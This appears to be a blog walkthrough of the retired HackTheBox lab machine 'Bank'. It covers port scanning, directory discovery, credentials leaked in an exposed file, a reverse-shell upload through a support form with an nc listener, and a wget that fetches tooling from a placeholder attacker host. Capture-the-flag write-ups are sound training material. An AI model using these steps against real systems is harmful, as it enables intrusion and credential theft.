Bank Walkthrough
Hey folks, we are back again with one of HackTheBox retired machines “Bank”, before we talk about it let’s take a look at its info
Let’s get started…
Nmap Scan
We usually start our scan with nmap scan to discover all open ports, service running, OS detection, etc
nmap -A -T4 -oG bank.gnmap 10.10.10.29
We have 3 open ports ssh/dns/http
I’ve tried to brute-force ssh credentials and search for vhosts or zone transfer but it fails so let’s go to the next step, nothing important here
Web Enumeration
If you try to open 10.10.10.29:80 you will get the default page of the server
But if you try echo "10.10.10.29 bank.htb" > /etc/hosts and search for http://bank.htb you will get a different page ‘Login portal’ and by using this plugin I know that it redirects me to an unknown page before getting the login portal.
Let’s start to discover the hidden directories by using dirbuster/gobuster/ffuf/dirsearch
You will get more of a bunch of directories which is open and available.
After discovering them, I’ve big data in the last one /balance_transfer
Note that all these files have the same size, but there’s one has a different size, so we will open it first
Good, we found credentials, let’s use them to login to the login portal
Here we go! Nice design :)
User Flag
After discovering the whole account, I found an upload function on bank.htb/support and then we grabbed a reverse shell from here and then uploaded it
The next step is to open nc as a listener on the port which I insert to the shell code nc -lvp <port> and then access the shell form the website
Nice, we’re in the server now but unfortunately in the user priv not root so let’s grab the user.txt first and then try to be root
Root Flag
It’s time now to grab the root.txt. I’ve used Linux-Exploit-Suggester to know which vulnerabilities the machine is affected by downloading it on the attack machine and then transferring it to the vulnerable machine
I’ve used python -m SimpleHTTPServer 80 to make the attacker machine act as a server, and then go to /tmp the directory in the vulnerable machine to have permission to write there and then downloaded wget http://<attacker-machine-ip>/<file-name> and it was downloaded. Let’s execute it
We have 4 vulnerabilities that works on this machine but unfortunately, there’s no one of them works with me, so I’ll try to discover all directories to find any juicy file which gave me a root access
After minutes, I found this directory /var/htb
And have this executable file
As you can see I’ve tried to execute it, but it’s failed so I execute it from the bin directory, and it’s worked as you can see ❤
Last updated
